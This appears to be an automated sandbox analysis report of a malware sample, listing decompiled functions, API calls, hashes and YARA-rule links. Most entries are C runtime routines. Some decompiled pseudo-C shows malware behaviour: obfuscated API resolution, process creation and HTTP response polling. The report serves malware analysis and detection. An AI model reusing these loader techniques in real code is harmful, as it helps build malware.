Part of subcall function 022B7B8D: strcpy.NTDLL ref: 022B7BD7
Part of subcall function 022B7B8D: lstrcat.KERNEL32(00000000,?), ref: 022B7BE2
Part of subcall function 022B7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,022B9DA0,?,047795B0), ref: 022B7BFF

StrTrimA.SHLWAPI(00000000,022BC28C,?,047795B0), ref: 022B55E8

Part of subcall function 022BA677: lstrlen.KERNEL32(04779BF8,00000000,00000000,7691C740,022B9DCB,00000000), ref: 022BA687
Part of subcall function 022BA677: lstrlen.KERNEL32(?), ref: 022BA68F
Part of subcall function 022BA677: lstrcpy.KERNEL32(00000000,04779BF8), ref: 022BA6A3
Part of subcall function 022BA677: lstrcat.KERNEL32(00000000,?), ref: 022BA6AE

lstrcpy.KERNEL32(00000000,?), ref: 022B5609
lstrcpy.KERNEL32(?,?), ref: 022B5611
lstrcat.KERNEL32(?,?), ref: 022B561F
lstrcat.KERNEL32(?,00000000), ref: 022B5625

Part of subcall function 022B7B3B: lstrlen.KERNEL32(?,00000000,04779C18,00000000,022B5142,04779E3B,?,?,?,?,?,69B25F44,00000005,022BD00C), ref: 022B7B42
Part of subcall function 022B7B3B: mbstowcs.NTDLL ref: 022B7B6B
Part of subcall function 022B7B3B: memset.NTDLL ref: 022B7B7D

wcstombs.NTDLL ref: 022B56B6

Part of subcall function 022B137B: SysAllocString.OLEAUT32(?), ref: 022B13B6

Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E

HeapFree.KERNEL32(00000000,?,?), ref: 022B56F7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 022B5703
HeapFree.KERNEL32(00000000,?,?,047795B0), ref: 022B570F
HeapFree.KERNEL32(00000000,?), ref: 022B571B
HeapFree.KERNEL32(00000000,?), ref: 022B5727

Strings

Ut, xrefs: 022B54DD

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: Ut
API String ID: 3748877296-8415677
Opcode ID: 8dc819f8307cff2afdc2be958d5d66a015661aa50408b0a5d3abc5872eec64bf
Instruction ID: 7b7ead74b19c89499723649987438689d052967554946676977ccc64b66a4515
Opcode Fuzzy Hash: 8dc819f8307cff2afdc2be958d5d66a015661aa50408b0a5d3abc5872eec64bf
Instruction Fuzzy Hash: 79913671D00249AFCB129FE4EC88AEEBBB9EF08390F544855F404AB261D770D961DF60

Uniqueness

Uniqueness Score: -1.00%

Function 0042A583, Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A612
_get_int64_arg.LIBCMTD ref: 0042A63A
__aullrem.LIBCMT ref: 0042A7DF
__aulldiv.LIBCMT ref: 0042A801
_write_multi_char.LIBCMTD ref: 0042A908
_write_string.LIBCMTD ref: 0042A923
_write_multi_char.LIBCMTD ref: 0042A94F
_wctomb_s.LIBCMTD ref: 0042A9CC

Strings

-, xrefs: 0042A8A8
9, xrefs: 0042A812

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
String ID: -$9
API String ID: 3451365851-1631151375
Opcode ID: e28aa4a69d47067587227fdaa3a01ec24bcfd6af5c749e57e9b6fedd5fc2f0d6
Instruction ID: 78399884fce185727bffb77cafe4c36f3e4e9afbfefd6c32b9dddc601960937f
Opcode Fuzzy Hash: e28aa4a69d47067587227fdaa3a01ec24bcfd6af5c749e57e9b6fedd5fc2f0d6
Instruction Fuzzy Hash: 1EF138B1E012299FDB24CF59DC89BAEB7B1BB44304F5481DAE409A7241D7389E90CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C1C5, Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C25A
_get_int64_arg.LIBCMTD ref: 0042C282
__aullrem.LIBCMT ref: 0042C42A
__aulldiv.LIBCMT ref: 0042C44C
_write_multi_char.LIBCMTD ref: 0042C565
_write_string.LIBCMTD ref: 0042C580
_write_multi_char.LIBCMTD ref: 0042C5AC
__mbtowc_l.LIBCMTD ref: 0042C61B

Strings

9, xrefs: 0042C45D

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
String ID: 9
API String ID: 3455034128-2366072709
Opcode ID: 6bba68cdb59bf134c0e80eea741eb4f53aa035d0e13288ddc792c03e4895b889
Instruction ID: 796ac3fced5700d4f5f18dad2ebcc49880b952f527cf27073e5d3226421308ad
Opcode Fuzzy Hash: 6bba68cdb59bf134c0e80eea741eb4f53aa035d0e13288ddc792c03e4895b889
Instruction Fuzzy Hash: FCF159B1E002299FDB24CF54DC81BAEB7B5FF44304F54859AE609AB241D738AE84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00426C73, Relevance: 25.8, APIs: 17, Instructions: 319COMMON

Download Yara Rule

APIs

_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426CBB
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426CF1
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426D12
wcsncnt.LIBCMTD ref: 00426D49
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00426DAF
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00427000

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~_$wcsncnt
String ID:
API String ID: 986326057-0
Opcode ID: 2a43658202f0a90367dc1493f1fbb92a5c45b10ef9694ece1ab0ee1f2c4bbf55
Instruction ID: 8cfb70372d27b63b160320ae70223e227e1ad5482f44b3afdf2ea89d459a2268
Opcode Fuzzy Hash: 2a43658202f0a90367dc1493f1fbb92a5c45b10ef9694ece1ab0ee1f2c4bbf55
Instruction Fuzzy Hash: 80E14931A00218EFCF04DF95D894AEEB7B1FF48304F61815AE5116B292DB38AE45DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0042A2E7, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042A2EB
__get_printf_count_output.LIBCMTD ref: 0042A2F9
__invalid_parameter.LIBCMTD ref: 0042A380
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042A395
_write_multi_char.LIBCMTD ref: 0042A908
_write_string.LIBCMTD ref: 0042A923
_write_multi_char.LIBCMTD ref: 0042A94F
_wctomb_s.LIBCMTD ref: 0042A9CC

Strings

-, xrefs: 0042A8A8

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
String ID: -
API String ID: 2357813345-2547889144
Opcode ID: 330b75ef8c6b94f476b8245b549597da44c28c4e36eedd74208aa3d818deb831
Instruction ID: c7b1d3cc8446317dede7de281db646664f679c0e1627e2bd15bdc199bea1a6db
Opcode Fuzzy Hash: 330b75ef8c6b94f476b8245b549597da44c28c4e36eedd74208aa3d818deb831
Instruction Fuzzy Hash: FFA1BDB0E002299BDB24DF55DC49BEEB7B1AF44304F5480DAE9097B281D7785EA0CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A135, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042A139
_strlen.LIBCMT ref: 0042A169
_write_multi_char.LIBCMTD ref: 0042A908
_write_string.LIBCMTD ref: 0042A923
_write_multi_char.LIBCMTD ref: 0042A94F
_wctomb_s.LIBCMTD ref: 0042A9CC

Strings

-, xrefs: 0042A8A8

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
String ID: -
API String ID: 2232461714-2547889144
Opcode ID: 9b38da79696b48017a79a3751c51525cb983d411d580641f96091f56c5ccbf54
Instruction ID: b22f749457ebff07bd857113f7dd6d7d17d22ad384d3b6ba7fe93d6b2696a21c
Opcode Fuzzy Hash: 9b38da79696b48017a79a3751c51525cb983d411d580641f96091f56c5ccbf54
Instruction Fuzzy Hash: 4AA18CB0E012299FDB24CF54DC89BEEB7B1AF44305F5481DAD8096B281D7789E90CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042BF2A, Relevance: 16.7, APIs: 11, Instructions: 238COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042BF2E
__get_printf_count_output.LIBCMTD ref: 0042BF3C
__invalid_parameter.LIBCMTD ref: 0042BFC3
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042BFD8
_write_multi_char.LIBCMTD ref: 0042C565
_write_string.LIBCMTD ref: 0042C580
_write_multi_char.LIBCMTD ref: 0042C5AC
__mbtowc_l.LIBCMTD ref: 0042C61B

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
String ID:
API String ID: 2386203720-0
Opcode ID: 6b55c97c5d38f768529eb9a498839eb9daa0eabcb21bb336c34a87882dc5178e
Instruction ID: c33fd31c84656c292cbdda4970a5ae32323cfa70d71a33a586563bb88af25e5f
Opcode Fuzzy Hash: 6b55c97c5d38f768529eb9a498839eb9daa0eabcb21bb336c34a87882dc5178e
Instruction Fuzzy Hash: C3A1A1B0E002299BDB24DF55DC81BAEB375EB44304F54409AE60A7B282D778AEC4CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00426236, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00426298
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004262AD
_memset.LIBCMT ref: 00426334
__invalid_parameter.LIBCMTD ref: 00426394
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004263A6
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004263E1

Strings

", xrefs: 0042639C
P, xrefs: 004263B6

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~_$_memset$__invalid_parameter
String ID: "$P
API String ID: 2173491032-1577843662
Opcode ID: f33f6cca13dd0591231f2ea0095d8a183edf30a1ce6d78efc314899412832e97
Instruction ID: c21a4939274ed4271e1687e0555496556df4f02c4c28587b6b88aa2db893d203
Opcode Fuzzy Hash: f33f6cca13dd0591231f2ea0095d8a183edf30a1ce6d78efc314899412832e97
Instruction Fuzzy Hash: DA51BC30A00219DBCF24DF99E846AAE7770FF44314F61862AEC255B3D1D3789996CF98

Uniqueness

Uniqueness Score: -1.00%

Function 022B3485, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E022B3485(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E022B4944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E022BA789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x22bd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x22bd2a8; // 0x24ba5a8
					_t18 = _t47 + 0x22be3e6; // 0x73797325
					_t68 = E022B7912(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x22bd2a8; // 0x24ba5a8
						_t19 = _t50 + 0x22be747; // 0x4778cef
						_t20 = _t50 + 0x22be0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E022B3179();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E022B3179();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x22bd238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E022B8B22(_t70);
				goto L12;
			}

0x022b348d
0x022b348d
0x022b349c
0x022b34a3
0x022b34a8
0x022b35b5
0x022b35bc
0x022b35bc
0x022b34b7
0x022b34bf
0x022b34c2
0x022b34c7
0x022b34dc
0x022b34e2
0x022b34e3
0x022b34e6
0x022b34ec
0x022b34ef
0x022b34f4
0x022b34fc
0x022b3508
0x022b350c
0x022b359c
0x022b3512
0x022b3512
0x022b3517
0x022b351e
0x022b3532
0x022b3536
0x022b3585
0x022b3538
0x022b3539
0x022b3540
0x022b3559
0x022b355b
0x022b355f
0x022b3566
0x022b3580
0x022b3568
0x022b3571
0x022b3576
0x022b3576
0x022b3566
0x022b3594
0x022b3594
0x022b350c
0x022b35a3
0x022b35ac
0x022b35b0
0x00000000

APIs

Part of subcall function 022B4944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,022B34A1,?,00000001,?,?,00000000,00000000), ref: 022B4969
Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 022B498B
Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 022B49A1
Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 022B49B7
Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 022B49CD
Part of subcall function 022B4944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 022B49E3

memset.NTDLL ref: 022B34EF

Part of subcall function 022B7912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,022B3508,73797325), ref: 022B7923
Part of subcall function 022B7912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 022B793D

GetModuleHandleA.KERNEL32(4E52454B,04778CEF,73797325), ref: 022B3525
GetProcAddress.KERNEL32(00000000), ref: 022B352C
HeapFree.KERNEL32(00000000,00000000), ref: 022B3594

Part of subcall function 022B3179: GetProcAddress.KERNEL32(36776F57,022B8BDC), ref: 022B3194

CloseHandle.KERNEL32(00000000,00000001), ref: 022B3571
CloseHandle.KERNEL32(?), ref: 022B3576
GetLastError.KERNEL32(00000001), ref: 022B357A

Strings

Ut, xrefs: 022B3594

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Ut
API String ID: 3075724336-8415677
Opcode ID: c15912badca4d28057a9b9eddee3c7cc8568ca65622a541c5d8dc1cfdd77ba9f
Instruction ID: fd1dff70a4592921381452b0b421e4e5a0e3ca2845c29e239a11e8732865da3f
Opcode Fuzzy Hash: c15912badca4d28057a9b9eddee3c7cc8568ca65622a541c5d8dc1cfdd77ba9f
Instruction Fuzzy Hash: EC3130B2C10209AFDB12EFE4D888DDEBBBDEF08344F054965E605A7115D770AA58DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0042BD54, Relevance: 13.7, APIs: 9, Instructions: 222COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042BD58
_strlen.LIBCMT ref: 0042BD88
_write_multi_char.LIBCMTD ref: 0042C565
_write_string.LIBCMTD ref: 0042C580
_write_multi_char.LIBCMTD ref: 0042C5AC
__mbtowc_l.LIBCMTD ref: 0042C61B

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
String ID:
API String ID: 909868375-0
Opcode ID: 3d807984be9d6bb2df6003a4d26d4d88c91a2463fac1afd7e3bf221db6938e08
Instruction ID: 6dfa2c8a0f64e67a01820d63bfd63d7e5a9f956585bf5902194ca58d945b89fd
Opcode Fuzzy Hash: 3d807984be9d6bb2df6003a4d26d4d88c91a2463fac1afd7e3bf221db6938e08
Instruction Fuzzy Hash: C0A170B1E00228DBDB24CF55DC81BEEB7B5EB44304F54819AE60967282D738AE84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 022B8F85, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E022B8F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x22bd33c; // 0x4779798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E022B9B1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x22bc18c;
				}
				_t46 = E022B7F8B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E022B1525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x22bd2a8; // 0x24ba5a8
						_t16 = _t75 + 0x22beb08; // 0x530025
						 *0x22bd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E022B9B1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x22bc190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E022B1525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E022B8B22(_v20);
						} else {
							_t66 =  *0x22bd2a8; // 0x24ba5a8
							_t31 = _t66 + 0x22bec28; // 0x73006d
							 *0x22bd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E022B8B22(_v12);
				}
				return _v24;
			}

0x022b8f8d
0x022b8f93
0x022b8f9a
0x022b8fa0
0x022b8fa4
0x022b8fa8
0x022b8fab
0x022b8fb0
0x022b8fb5
0x022b8fb7
0x022b8fb7
0x022b8fc0
0x022b8fc5
0x022b8fca
0x022b8fd0
0x022b8fda
0x022b8fe3
0x022b8fea
0x022b9003
0x022b9008
0x022b900d
0x022b9016
0x022b901f
0x022b9030
0x022b9039
0x022b903d
0x022b9041
0x022b9046
0x022b904b
0x022b904d
0x022b904d
0x022b9057
0x022b9060
0x022b9067
0x022b907f
0x022b9083
0x022b90c0
0x022b9085
0x022b9088
0x022b9090
0x022b90a1
0x022b90ad
0x022b90b5
0x022b90b9
0x022b90b9
0x022b9083
0x022b90c8
0x022b90cd
0x022b90d4

APIs

GetTickCount.KERNEL32 ref: 022B8F9A
lstrlen.KERNEL32(?,80000002,00000005), ref: 022B8FDA
lstrlen.KERNEL32(00000000), ref: 022B8FE3
lstrlen.KERNEL32(00000000), ref: 022B8FEA
lstrlenW.KERNEL32(80000002), ref: 022B8FF7
lstrlen.KERNEL32(?,00000004), ref: 022B9057
lstrlen.KERNEL32(?), ref: 022B9060
lstrlen.KERNEL32(?), ref: 022B9067
lstrlenW.KERNEL32(?), ref: 022B906E

Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 782a33002dcd595cac8484a355f77a5f28980b58dfef09fa3396f63d7bd67418
Instruction ID: 741fae450cca97d0670da386c7bf2a21a6416f36447a4e75934b162f5456194a
Opcode Fuzzy Hash: 782a33002dcd595cac8484a355f77a5f28980b58dfef09fa3396f63d7bd67418
Instruction Fuzzy Hash: DD416772D1021AFBCF12AFE4DC489DEBBB5EF48384F014451EA04A7225DB319A60DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0041A205, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 264memoryCOMMON

Download Yara Rule

APIs

_CheckBytes.LIBCMTD ref: 0041A219
__CrtIsValidHeapPointer.LIBCMTD ref: 0041A2A5
_CheckBytes.LIBCMTD ref: 0041A350
_CheckBytes.LIBCMTD ref: 0041A40A
_memset.LIBCMT ref: 0041A501
__free_base.LIBCMTD ref: 0041A50D

Strings

tDj, xrefs: 0041A25B

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: BytesCheck$HeapPointerValid__free_base_memset
String ID: tDj
API String ID: 25084783-2513116121
Opcode ID: 71aa9a90eb5f64dacc70286fbac619a336f71b7ee24760cba3e339261cfa5227
Instruction ID: 5dd4d98ab5190a1095745a5b94f79f969744d1cbc82d9d8fcdafaa2f52b2d70b
Opcode Fuzzy Hash: 71aa9a90eb5f64dacc70286fbac619a336f71b7ee24760cba3e339261cfa5227
Instruction Fuzzy Hash: CB91E574B40204FBDB24CB85DD86FAA7366AB44704F344159F6046B3C2C279EE91CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00425DD0, Relevance: 12.2, APIs: 8, Instructions: 160COMMON

Download Yara Rule

APIs

_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00425E0E
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00425E38
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00425E83

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~_
String ID:
API String ID: 1901436342-0
Opcode ID: 2f40e07e0bf703822dcd61d85a002d1bcbc9ca099beb512a7405501aa6d54e01
Instruction ID: 2bd9e11a0deec5aad687e469c1ff23c29a0ff68e06fdcd3bfe10575ba81f8d1a
Opcode Fuzzy Hash: 2f40e07e0bf703822dcd61d85a002d1bcbc9ca099beb512a7405501aa6d54e01
Instruction Fuzzy Hash: 20611A70A00119DFCB04DFA9D9949EEB7B1FF48304F21815EE815AB391DB38AE41DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042A5B1, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A612
__aullrem.LIBCMT ref: 0042A7DF
__aulldiv.LIBCMT ref: 0042A801

Strings

', xrefs: 0042A5B1
0, xrefs: 0042A5CD
9, xrefs: 0042A812

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: 327a9953c4c473a7afef10fe0b1b1c07e9e32e551558298e4dbbb7f0609559cb
Instruction ID: 8977922218446ab2660389953bacc8e2e3d6ab55067b3962a46a12034288b51d
Opcode Fuzzy Hash: 327a9953c4c473a7afef10fe0b1b1c07e9e32e551558298e4dbbb7f0609559cb
Instruction Fuzzy Hash: DF4126B1E05228DFDB20CF58D889BAEB7B1FB84304F5481DAD449A7240C7389E91CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 022B57DD, Relevance: 10.6, APIs: 7, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E022B57DD(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E022B1525(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E022B8B22(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E022B29C0( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x022b57dd
0x022b57dd
0x022b57ed
0x022b57f0
0x022b57f4
0x022b57fa
0x022b57ff
0x022b5818
0x022b582c
0x022b5833
0x022b583a
0x022b588d
0x022b5893
0x022b5899
0x022b58d4
0x022b58da
0x00000000
0x00000000
0x00000000
0x022b5899
0x022b5840
0x00000000
0x022b5847
0x022b5855
0x022b5858
0x022b585b
0x022b5867
0x022b586b
0x022b58cd
0x022b586d
0x022b587f
0x022b58bd
0x022b58c8
0x022b5881
0x022b5884
0x022b5888
0x022b5888
0x022b587f
0x00000000
0x022b586b
0x022b5840
0x022b5804
0x022b580a
0x022b580d
0x022b5812
0x00000000
0x00000000
0x00000000
0x022b58a2
0x022b58aa
0x022b58af
0x022b58b2
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 022B57F4
SetEvent.KERNEL32(?), ref: 022B5804
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 022B5836
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 022B585B
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 022B587B
GetLastError.KERNEL32 ref: 022B588D

